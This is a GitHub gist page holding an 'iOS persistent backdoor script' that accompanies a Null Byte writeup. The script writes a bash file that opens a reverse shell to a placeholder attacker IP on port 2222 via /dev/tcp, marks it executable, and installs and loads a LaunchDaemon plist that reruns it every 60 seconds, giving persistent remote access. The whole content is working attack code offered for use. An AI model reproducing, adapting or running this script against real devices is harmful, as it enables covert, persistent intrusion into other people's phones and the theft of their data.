Skip to content

Instantly share code, notes, and snippets.

@tokyoneon

tokyoneon/persistence.gist

Created August 5, 2020 03:31
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save tokyoneon/6937de009b94a6a5cd50fee9bc81c8bd to your computer and use it in GitHub Desktop.
Save tokyoneon/6937de009b94a6a5cd50fee9bc81c8bd to your computer and use it in GitHub Desktop.
Download ZIP
iOS persistent backdoor script
Raw
persistence.gist
# writeup: https://null-byte.com/backdoor-0325535/
# create bash script executable
echo -e '#!/bin/bash\nexport PS1="backdoor> "\nbash -i >& /dev/tcp/ATTACKER-IP-ADDRESS/2222 0>&1' >/Library/Caches/persistence
# elevate file permissions
chmod +x /Library/Caches/persistence
# create launchd service
printf '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.tokyoneon.persistence</string>
<key>Program</key>
<string>/bin/sh</string>
<key>ProgramArguments</key>
<array>
<string>/bin/bash</string>
<string>/Library/Caches/persistence</string>
</array>
<key>inetdCompatibility</key>
<dict>
<key>Wait</key>
<true/>
</dict>
<key>StartInterval</key>
<integer>60</integer>
</dict>
</plist>' >/Library/LaunchDaemons/com.tokyoneon.persistence.plist
# enable service
launchctl load /Library/LaunchDaemons/com.tokyoneon.persistence.plist
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment